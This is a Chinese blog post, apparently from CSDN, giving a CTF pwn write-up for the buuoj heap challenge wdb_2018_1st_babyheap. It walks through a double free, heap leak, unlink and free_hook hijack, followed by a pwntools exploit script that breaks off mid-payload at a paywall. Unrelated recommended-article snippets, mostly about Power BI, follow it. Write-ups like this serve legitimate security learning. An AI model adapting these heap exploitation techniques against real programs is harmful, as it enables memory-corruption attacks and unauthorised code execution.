buuoj Pwn writeup 171-175

多个CTF安全题目的解题思路
最新推荐文章于 2025-11-30 06:14:52 发布
原创 最新推荐文章于 2025-11-30 06:14:52 发布 · 433 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全

博客介绍了多个CTF安全题目的解题思路,包括wdb_2018_1st_babyheap、npuctf_2020_bad_guy等。涉及堆溢出、格式化字符串、数组越界等漏洞利用,通过泄露地址、劫持hook等方法达到攻击效果,还给出了部分题目的注意事项和exp。

171 wdb_2018_1st_babyheap

在这里插入图片描述add
在这里插入图片描述
edit
在这里插入图片描述
只能编辑三次。

show
在这里插入图片描述
free
在这里插入图片描述
简单的uaf。

我们可以通过unlink来泄露地址,劫持free_hook。

要注意的是它自己写的一个输入函数。
在这里插入图片描述要么就回车截断,要么就输入32个。所以我们在写exp的时候如果是32字节,就不要加回车,如果不够32个字节,就一定要加回车,不然输入是截断不了的。

先通过double free泄露地址,然后把heap_base + 0x10的chunk申请到。并且把heap_base再挂进去。
在这里插入图片描述将heap_base + 0x10的地方拿回来,伪造好chunk,然后再次将heap_base申请回来伪造好chunk头,做一个unlink,目的是可以泄露libc地址,也可以顺便控制bss,劫持free_hook。

最后达到这样一个效果。
在这里插入图片描述

# -*- coding: utf-8 -*-
from pwn import*

context.log_level = "debug"

r = process("./171")
#r = remote("node3.buuoj.cn", "25155")
elf = ELF("./171")
libc = ELF("/home/wuangwuang/glibc-all-in-one-master/glibc-all-in-one-master/libs/2.23-0ubuntu11.2_amd64/libc.so.6")
#libc = ELF("./64/libc-2.23.so")

def add(index, content):
    r.sendlineafter("Choice:", "1")
    r.sendlineafter("Index:", str(index))
    r.sendafter("Content:", content)

def edit(index, content):
    r.sendlineafter("Choice:", "2")
    r.sendlineafter("Index:", str(index))
    r.sendafter("Content:", content)

def show(index):
    r.sendlineafter("Choice:", "3")
    r.sendlineafter("Index:", str(index))

def delete(index):
    r.sendlineafter("Choice:", "4")
    r.sendlineafter("Index:", str(index))

bss_addr = 0x602060

add(0, (p64(0)+p64(0x31))*2)
add(1, 'aaa\n')
add(2, 'aaa\n')
add(3, 'aaa\n')
add(4, '/bin/sh\n')

delete(0)
delete(1)
delete(0)
show(0)
heap_base = u64(r.recvuntil('\n')[:-1].ljust(8, '\x00')) - 0x30
print "heap_base" + hex(heap_base)

edit(0, p64(heap_base + 0x10)+'\n')
add(5, p64(0) + p64(0x31) + p64(heap_base) + p64(bss_addr-0x10))
#把heap_base再次挂进bins中.

payload = p64(bss_addr-0x18) + p64(bss_addr-0x10) + p64(0x20) + p64(0x90
最低0.47元/天 解锁文章
PowerBI自定义函数
Fabric丨白茶
09-20 1159
Power BI Desktop 9月版本推出自定义函数(UDF)功能,为开发者带来重要变革。文章详细介绍了UDF的语法规则,包括DEFINE FUNCTION结构、参数类型(AnyVal/Scalar/Table/AnyRef)和传递模式(val/expr)。通过日期表创建和环比/同比计算两个实际案例,展示了UDF如何简化重复逻辑构建。目前该功能仍为预览版,存在递归限制、IntelliSense支持不足等约束。
Power BI 报告开发前的几个重要设置 | 数据预览 关系检测 时间智能 区域设置 恢复时间
Jinsuoxiaobai的博客
01-19 572
作为商业级别的数据可视化工具,Power BI 的入门相对容易。如果你已经是Excel的深度用户,比如你已经比较熟悉常见的数据处理,图表设计,基本计算公式,可能入门会更快一些。 但要深入研究,开发出企业级 BI 报告的话,还需要更加深入的研究。 今天主要聊一下,在开始你的报告开发之前,需要对 Power BI 所做的几个非常重要的设置。 ...
DeepSeek + Power BITMDL 脚本让 AI 更懂 BI
dotNET跨平台
03-09 696
你是否也遇到过以下问题:• 每次面对 Power BI 的数据模型关系建立,都感到非常麻烦和头痛?• 想要迅速实现数据模型调整、度量值构建,但又苦于 DAX 代码复杂难懂?• 期待有一种方式能快速、清晰地管理和优化模型结构?别担心,现在有一种更加智能的解决方案,轻松破解这些难题,这就是Power BI TMDL 脚本与 DeepSeek 的结合!将 TMDL 脚本上传给 DeepSeek 后,D...
Power BI 四月新功能分享:看完演示轻松get
Sharewinfo_BJ的博客
04-27 336
数据分析领导者
DeepSeek + Power BI 带来个人ABI革命
dotNET跨平台
02-07 1200
大家都知道,ChatGPT 并不是人人能用,Copilot 也有很高的门槛,而现在火爆的 DeepSeek 让人人都可以使用,并获得几乎等价于最先进 AI 的能力。这对 Power BI 的个人分析师意味着什么呢?在 2025 年开年上班第一日,本文将为大家一起展望我们可以从其中得到的收益。技术门槛的彻底消解:从“代码恐惧”到自然语言交互DeepSeek 说:传统Power BI用户需掌握DAX公...
DeepSeek + Power BI,建模篇
dotNET跨平台
02-12 1149
在 2025 年开工后的第一日,BI佐罗老师从多个方面介绍了 DeepSeek + Power BI 如何带来 ABI 革命。参考:DeepSeek + Power BI 带来个人ABI革命未来我们会从实际使用方面为大家介绍如何使用 DeepSeek 让 Power BI 更加自动化,本文就是此系列的第一篇,如何利用 DeepSeek + Power BI 完成 AI 建模。在传统数据分析中,构建...
Power BI 2025 年 9 月功能
BI瓶子的博客
09-21 286
1、 必应地图视觉对象图标将从可视化窗格的默认视觉对象列表中删除。2、刷新 Power BI Desktop 中的数据或架构选项。4、下载 XMLA 更改语义模型的 PBIX。5、DAX 用户定义函数(预览版)3、TMDL 视图(正式发布)
合并多个excel工作簿的案例来分析powerbi和quickbi功能的优势和劣势
BI瓶子的博客
07-15 1159
Table.AddColumn(删除的列, "自定义", each Excel.Workbook([Content]))医生数 =CALCULATE(DISTINCTCOUNT('测试'[医生]))项目数 =CALCULATE(DISTINCTCOUNT('测试'[项目]))科室数 =CALCULATE(DISTINCTCOUNT('测试'[科室]))powerbi可以单个工作簿导入数据,也可以导入整个文件夹;而quickbi只能以单个工作簿导入数据。
如何用ai,在power bi 中,用TMDL视图,建立自己想要的数
03-10
好的,我需要帮助用户在Power BI中使用AI和TMDL视图创建自定义数据可视化。首先,我应该了解TMDL视图是什么以及它如何与AI结合使用。根据引用[1],TMDL视图允许使用TMDL代码编辑器对语义模型进行脚本编写和修改,...
TMDL技术在东湖水污染控制中的应用 (2009年)
04-25
### TMDL技术在东湖水污染控制中的应用解析 #### 概述 TMDL(Total Maximum Daily Load,即总量最大日负荷)技术是一种先进的水污染控制与管理技术,在国外已有广泛应用,并逐渐受到国内科研设计部门及管理部门的...
CE-QUAL-ICM开源富营养化模型v1.0发布
在美国切萨皮克湾的实际应用中,CE-QUAL-ICM 被用于评估流域营养盐减排政策的果,预测不同管理措施下未来水质改善趋势,并为《切萨皮克湾协议》中的总最大日负荷(TMDL)计划供科学依据。通过对历史数据的率定与...
PowerBI常见报错故障
专注“目标检测”领域技术分享
11-30 54
因为日期没有和销售额所在的表建立联系建立关系以后。
项目极简说明_这是一个基于Python和C语言开发的第三方校园网认证客户端专门针对华中科技大学校园网认证系统设计通过逆向分析官方客户端协议并修复前辈项目中的漏洞实现了完整的认.zip
11-30
项目极简说明_这是一个基于Python和C语言开发的第三方校园网认证客户端专门针对华中科技大学校园网认证系统设计通过逆向分析官方客户端协议并修复前辈项目中的漏洞实现了完整的认.zip
华中科技大学网络安全课程设计项目_一个基于Linux内核模块开发的状态检测防火墙原型系统_实现规则过滤功能包括按五元组和动作过滤报文并记录访问日志_规则维护功能支持添加删除修改查看.zip
11-30
华中科技大学网络安全课程设计项目_一个基于Linux内核模块开发的状态检测防火墙原型系统_实现规则过滤功能包括按五元组和动作过滤报文并记录访问日志_规则维护功能支持添加删除修改查看.zip
2022年华中科技大学C语言头歌试题解答项目_一个边学边写的大一入门级C语言学习与练习资源库_包含2022年华中科技大学C语言头歌课程的所有试题解答代码示例和详细注释_帮助大一新生.zip
11-30
2022年华中科技大学C语言头歌试题解答项目_一个边学边写的大一入门级C语言学习与练习资源库_包含2022年华中科技大学C语言头歌课程的所有试题解答代码示例和详细注释_帮助大一新生.zip
【四轴飞行器的位移控制】控制四轴飞行器的姿态和位置设计内环和外环PID控制回路(Simulink仿真实现)
11-30
【四轴飞行器的位移控制】控制四轴飞行器的姿态和位置设计内环和外环PID控制回路(Simulink仿真实现)内容概要:本文详细介绍了如何通过Simulink仿真设计四轴飞行器的位移控制,重点在于构建内外环PID控制回路以实现对飞行器姿态和位置的精确控制。内环负责稳定飞行器的姿态(如俯仰、横滚和偏航),外环则根据期望的位置指令生成姿态参考信号,从而实现整体的位移控制。文中涵盖了控制系统建模、PID参数整定及仿真验证等关键步骤,展示了完整的控制策略设计流程,并通过仿真结果验证了该方法的有性与稳定性。; 适合人群:具备自动控制理论基础和Simulink使用经验的高校学生、科研人员及从事无人机控制系统的研发工程师。; 使用场景及目标:①掌握四轴飞行器姿态与位置控制的基本原理;②学习内外环PID控制器的设计与调试方法;③应用于无人机飞行控制算法开发与仿真验证;④作为课程设计或科研项目的参考实现方案。; 阅读建议:建议读者结合Simulink环境动手实践,逐步搭建控制系统模型,重点关注PID参数调节对系统动态性能的影响,并可通过添加干扰项或非线性因素进一步升仿真真实性。
该项目是一个专门为PyTorch深度学习框架供预编译二进制包的GitHub仓库_它包含了从v131到最新版本的许多Linux兼容轮子文件_这些文件经过重新构建以支持NVIDI.zip
最新发布
11-30
该项目是一个专门为PyTorch深度学习框架供预编译二进制包的GitHub仓库_它包含了从v131到最新版本的许多Linux兼容轮子文件_这些文件经过重新构建以支持NVIDI.zip
算法竞赛蓝桥杯高频考点解析【最吊的笔记】看就对了
11-30
内容概要:本文档是一份针对蓝桥杯竞赛的复习资料,涵盖了算法复杂度分析、常见数据结构(如优先队列、并查集)、经典算法(如二分查找、贪心、动态规划、DFS/BFS)以及数学基础知识(如最大公约数、质数筛法、进制转换)等内容。文档通过代码示例和注释详细讲解了各类题型的解题思路与实现技巧,包括时间复杂度估算、调试方法、常见模型应用(如外卖优先级、航班时差计算)及优化策略(如前缀和、差分、双指针)。此外,还供了大量实战代码片段,便于理解和掌握竞赛常用算法。; 适合人群:准备参加蓝桥杯等程序设计竞赛的学生,具备一定C++编程基础,熟悉基本数据结构与算法的初学者或中级选手。; 使用场景及目标:①用于赛前系统性复习,巩固算法与数据结构知识;②升对常见竞赛题型的理解与编码能力;③通过典型例题掌握高解题思路与代码实现技巧。; 阅读建议:建议结合实际编程练习,逐个模块理解并动手实现代码,重点关注时间复杂度分析、边界处理和算法优化细节,同时利用文档中的模板代码进行针对性训练。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值